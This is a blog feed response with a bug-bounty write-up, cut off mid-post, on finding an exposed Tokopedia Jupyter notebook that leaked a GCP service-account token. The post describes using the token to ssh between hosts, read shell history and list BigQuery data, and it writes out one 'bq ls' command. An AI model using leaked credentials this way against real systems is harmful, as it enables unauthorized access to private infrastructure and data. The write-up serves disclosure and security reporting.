// API callback
related_results_labels_thumbs({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238"},"updated":{"$t":"2025-01-05T17:25:28.521-05:00"},"category":[{"term":"Pentesting"},{"term":"Metasploit"},{"term":"cktricky"},{"term":"hacking"},{"term":"Book Reviews"},{"term":"Security Conferences"},{"term":"news"},{"term":"devoops"},{"term":"Chris Gates"},{"term":"client side attacks"},{"term":"devops"},{"term":"rant"},{"term":"web application testing"},{"term":"oracle"},{"term":"low2pwned"},{"term":"information Gathering"},{"term":"pwnage"},{"term":"auxiliary modules"},{"term":"carnal0wnage"},{"term":"cloud"},{"term":"enumeration"},{"term":"EthicalHacker.net"},{"term":"Learn Security Online"},{"term":"chicagocon"},{"term":"Kubernetes"},{"term":"Wireless"},{"term":"day in the life"},{"term":"jenkins"},{"term":"Maltego"},{"term":"certification"},{"term":"meterpreter"},{"term":"mimikatz"},{"term":"pass the hash"},{"term":"phishing"},{"term":"politics"},{"term":"Security"},{"term":"malware"},{"term":"password cracking"},{"term":"post-exploitation"},{"term":"powershell"},{"term":"Incident Response"},{"term":"android"},{"term":"automation"},{"term":"blackhat DC"},{"term":"exploits"},{"term":"linux"},{"term":"press"},{"term":"privacy"},{"term":"token impersonation"},{"term":"toorcon"},{"term":"SQL  Injection"},{"term":"incognito"},{"term":"mubix"},{"term":"scanning"},{"term":"shmoocon 09"},{"term":"webcasts"},{"term":"wrap-up"},{"term":"DNS"},{"term":"HackerDefender"},{"term":"Security Metrics"},{"term":"VNC"},{"term":"aircrack-ng"},{"term":"chris nickerson"},{"term":"fail"},{"term":"mike murray"},{"term":"nmap"},{"term":"rootkit"},{"term":"shmoocon 08"},{"term":"shotgun posts"},{"term":"token kidnaping"},{"term":"Crash Course in Penetration Testing"},{"term":"Full Scope Security"},{"term":"IPv6"},{"term":"Paterva"},{"term":"Physical Security"},{"term":"Research"},{"term":"SOURCE Boston 2009"},{"term":"Scapy"},{"term":"antivirus"},{"term":"coldfusion"},{"term":"hack tools"},{"term":"hakin9"},{"term":"http options"},{"term":"identity theft"},{"term":"interviews"},{"term":"jboss"},{"term":"karma"},{"term":"nessus"},{"term":"passthehash toolkit"},{"term":"podcasts"},{"term":"privacy is dead"},{"term":"rpcclient"},{"term":"snmp"},{"term":"social engineering"},{"term":"ubuntu"},{"term":"webdav"},{"term":"AttackResearch"},{"term":"Botnets"},{"term":"Dan Hoffman"},{"term":"GoogleAds"},{"term":"Joe McCray"},{"term":"MAME"},{"term":"NTP"},{"term":"Network Mapping"},{"term":"OMG Python"},{"term":"Packet Analysis"},{"term":"Programming"},{"term":"RetroPie"},{"term":"SCADA"},{"term":"Security Data Visualization"},{"term":"Traceroute"},{"term":"Traceroute Visulization"},{"term":"airodump-ng"},{"term":"attack analysis"},{"term":"aws"},{"term":"backtrack2"},{"term":"backtrack3"},{"term":"blue teaming"},{"term":"cadaver"},{"term":"citrix hacking"},{"term":"conspiracy"},{"term":"coolest Dad ever"},{"term":"defcon"},{"term":"defense"},{"term":"digging into the chewy center"},{"term":"elasticsearch"},{"term":"emulators"},{"term":"foursquare"},{"term":"ike-scan"},{"term":"install your own linux distro"},{"term":"java"},{"term":"javascript"},{"term":"jeremiah grossman"},{"term":"john the ripper"},{"term":"kanoOS kano computers"},{"term":"karmasploit"},{"term":"karmetasploit"},{"term":"lotus domino"},{"term":"mentoring"},{"term":"mssql"},{"term":"mssql_login"},{"term":"mssql_ping"},{"term":"msvctl"},{"term":"null-session"},{"term":"paranoia"},{"term":"privilege escalation"},{"term":"purple teaming"},{"term":"raspberry pi"},{"term":"risk management"},{"term":"ruby"},{"term":"scripting"},{"term":"sensepost"},{"term":"sqlmap"},{"term":"ssl"},{"term":"stupid users"},{"term":"tempest"},{"term":"twitter"},{"term":"windows vista"},{"term":"8570.1"},{"term":"AFP"},{"term":"DNS Fingerprinting"},{"term":"DNS exploit"},{"term":"Dr-crack"},{"term":"EFF NSA Shirt"},{"term":"Endpoint Security"},{"term":"Fabric"},{"term":"Fresh New Look"},{"term":"Full Scope Testing"},{"term":"Fuzzing: Brute Force Vulnerability Discovery"},{"term":"GCP"},{"term":"Geek Mafia"},{"term":"HE Windows"},{"term":"HR Geeks"},{"term":"Hacking Exposed Windows"},{"term":"IE7 Exploit"},{"term":"Information Security Day"},{"term":"Joe Klein"},{"term":"Johnny Long"},{"term":"LG voyager"},{"term":"MAC addresses"},{"term":"Mail"},{"term":"Metasploit Pro"},{"term":"No Place To Hide"},{"term":"No Tech Hacking"},{"term":"NoVA Sec"},{"term":"P2P"},{"term":"Programming Book Review Criteria"},{"term":"QEMU"},{"term":"SOURCE Boston 2008"},{"term":"The Art of Software Security Testing"},{"term":"The Craft of System Security"},{"term":"Traceroute Aggregation"},{"term":"Val Smith"},{"term":"WTF"},{"term":"XSS"},{"term":"amplification attacks"},{"term":"apple filing protocol"},{"term":"brute forcing"},{"term":"bugbounty"},{"term":"burp suite"},{"term":"bypassuac"},{"term":"chef"},{"term":"cisco"},{"term":"cisco asa"},{"term":"conti"},{"term":"cve"},{"term":"databases"},{"term":"deauth attack"},{"term":"defeating AV"},{"term":"dhcp script injection"},{"term":"digital signatures"},{"term":"dll"},{"term":"docker"},{"term":"domo kun video"},{"term":"ec2"},{"term":"education"},{"term":"eeepc"},{"term":"enum4linux"},{"term":"espionage"},{"term":"excel macro"},{"term":"exotic liability"},{"term":"exploit dev course"},{"term":"fckeditor"},{"term":"file format"},{"term":"firewire"},{"term":"forenics"},{"term":"full disclosure"},{"term":"github"},{"term":"google dorks"},{"term":"gsecdump"},{"term":"hack minecraft"},{"term":"hadoop"},{"term":"hijacking"},{"term":"http-dir-enum"},{"term":"ida pro"},{"term":"impacket"},{"term":"infosecwriters.com"},{"term":"irc"},{"term":"java decompile"},{"term":"kerberos"},{"term":"kickstart files"},{"term":"kismet"},{"term":"layer2"},{"term":"lft"},{"term":"life"},{"term":"linkedin"},{"term":"local root"},{"term":"local to domain account"},{"term":"metacab"},{"term":"metagoofil"},{"term":"motorola xoom root"},{"term":"mwr InfoSecurity"},{"term":"ncrack"},{"term":"netapp"},{"term":"non-english"},{"term":"notes"},{"term":"null sa"},{"term":"offtopic"},{"term":"opinion"},{"term":"osx"},{"term":"password filters"},{"term":"pentoo"},{"term":"persistence"},{"term":"pidgin"},{"term":"portqry"},{"term":"printer hacking"},{"term":"procdump"},{"term":"process injection"},{"term":"proxychains"},{"term":"puttyhijack"},{"term":"pwn plug elite"},{"term":"quotes"},{"term":"rainbow tables"},{"term":"reDuh"},{"term":"red team"},{"term":"red teaming"},{"term":"redis"},{"term":"resource scripts"},{"term":"rfid"},{"term":"richard bejtlich"},{"term":"roomwizard"},{"term":"scams"},{"term":"scp"},{"term":"sensitive data leakage"},{"term":"server-status"},{"term":"sharepoint"},{"term":"shmoocon 15"},{"term":"silc"},{"term":"slicehost"},{"term":"smbshell"},{"term":"sqid"},{"term":"sqlite3"},{"term":"sticky keys"},{"term":"sticky ports"},{"term":"sunday comics"},{"term":"swfscan"},{"term":"talks"},{"term":"thin client hacking"},{"term":"timestomp"},{"term":"tnscmd"},{"term":"tsa"},{"term":"unicornscan"},{"term":"upload.asp"},{"term":"usernames"},{"term":"vagrant"},{"term":"volatility"},{"term":"volreg"},{"term":"vulnerability"},{"term":"w3af"},{"term":"webgoat"},{"term":"webshells"},{"term":"weridAAL"},{"term":"wmap"},{"term":"wmic"},{"term":"wordpress"},{"term":"xml"},{"term":"yersinia"},{"term":"youtube"},{"term":"zone transfers"}],"title":{"type":"text","$t":"Carnal0wnage Blog"},"subtitle":{"type":"html","$t":""},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/posts\/default"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/-\/Pentesting?alt=json-in-script\u0026max-results=6"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/search\/label\/Pentesting"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"},{"rel":"next","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/-\/Pentesting\/-\/Pentesting?alt=json-in-script\u0026start-index=7\u0026max-results=6"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"199"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"6"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2552988186359746960"},"published":{"$t":"2020-03-13T22:10:00.001-04:00"},"updated":{"$t":"2020-03-24T15:56:05.127-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"bugbounty"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"What is your GCP infra worth?...about ~$700 [Bugbounty]"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\nBugBounty story\u0026nbsp;#bugbountytips\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nA fixed but they didn't pay the bugbounty story...\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTimeline:\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003Ereported 21 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated at Critical\u0026nbsp; 23 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated as fixed 30 Oct 2019\u003C\/li\u003E\n\u003Cli\u003EBounty amount stated (IDR 10.000.000 = ~700 USD) 12 Nov 2019\u003C\/li\u003E\n\u003Cli\u003EInformation provided for payment 16 Nov 2019\u003C\/li\u003E\n\u003Cli\u003E13 March 2020 - Never paid - blog post posted\u003C\/li\u003E\n\u003Cli\u003E19 March 2020\u0026nbsp; - received bounty of $565.86\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cbr \/\u003E\nThere are lots of applications that are SAAS - \u003Ca href=\"https:\/\/www.youtube.com\/watch?v=JVCsy-T94k4\u0026amp;list=UUef0TWni8ghLcJphdmDBoxw\" target=\"_blank\"\u003EShell as a Service\u003C\/a\u003E. Jupyter Notebook is one of these with its running code feature as well as its terminal functionality.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhile I was trolling shodan looking for vulnerable boxes i came across an open Jupyter notebook belonging to \u003Ca href=\"https:\/\/www.tokopedia.com\/\" target=\"_blank\"\u003ETokopedia\u003C\/a\u003E. This wasn't obvious at first , but it will become clear how I identified this as you check out the screenshots.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s1600\/notebooks-main-page.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"495\" data-original-width=\"1600\" height=\"198\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s640\/notebooks-main-page.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EOpen Jupyter notebook server\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\nI did a post on what do do when you find a GCP key in a \u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/i-found-gcp-service-account-tokennow.html\" target=\"_blank\"\u003Eprevious post\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThis is especially important when people leave their GCP service account keys in folders\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk\/s1600\/Screen+Shot+2020-01-06+at+7.42.19+PM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"130\" data-original-width=\"1600\" height=\"50\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk\/s640\/Screen+Shot+2020-01-06+at+7.42.19+PM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EWhen you leave your service token in the folder for all to find\/use\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\nIn this case it was base64 encoded - but easy to fix\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M\/s1600\/token-b64decode.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1440\" data-original-width=\"1318\" height=\"320\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M\/s320\/token-b64decode.png\" width=\"292\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003Eservice account token b64 decoded\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\nIt was also in the error output of one of the jupyter notebooks\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4\/s1600\/creds-via-notebook-error.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"635\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4\/s640\/creds-via-notebook-error.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nI had used the terminal to do some basic poking around to find the owner\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s\/s1600\/uname-a-tokepedia-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"283\" data-original-width=\"1600\" height=\"112\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s\/s640\/uname-a-tokepedia-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4\/s1600\/creds-via-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1022\" data-original-width=\"1600\" height=\"408\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4\/s640\/creds-via-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan id=\"goog_513689851\"\u003E\u003C\/span\u003E\u003Cspan id=\"goog_513689852\"\u003E\u003C\/span\u003E\u003Cbr \/\u003E\nOnce I identified it was owned by someone with a bug bounty program I figured it was ok to prove access and impact.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nPer the GCP blog post once you have the service account token you authenticate and interact with services your token has access to\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE\/s1600\/tokepedia-gcp-compute-list.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"269\" data-original-width=\"1600\" height=\"106\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE\/s640\/tokepedia-gcp-compute-list.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nThe handy thing about getting a shell on a GCP compute host is that all the GCP utils are installed and \"just work\" I actually didn't need to do anything from an external host I was able to start ssh'ing to other hosts from within the jupyter terminal.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y\/s1600\/ssh+to+seonper-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"952\" data-original-width=\"1600\" height=\"380\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y\/s640\/ssh+to+seonper-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA\/s1600\/ssh+to+seonper-1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"552\" data-original-width=\"1590\" height=\"222\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA\/s640\/ssh+to+seonper-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w\/s1600\/ssh-abe-mf-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"968\" data-original-width=\"1600\" height=\"386\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w\/s640\/ssh-abe-mf-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q\/s1600\/cat+bash_history+on+ab-md-1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"962\" data-original-width=\"1600\" height=\"384\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q\/s640\/cat+bash_history+on+ab-md-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nBigquery tables o_0\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E[+] Bigquery access [+]\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ebq ls --format=prettyjson --project_id tokopedia-970\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0\/s1600\/Screen+Shot+2020-03-13+at+10.23.35+PM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"724\" data-original-width=\"998\" height=\"232\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0\/s320\/Screen+Shot+2020-03-13+at+10.23.35+PM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EDat billing table yo\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ\/s1600\/Screen+Shot+2020-03-13+at+10.23.57+PM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg 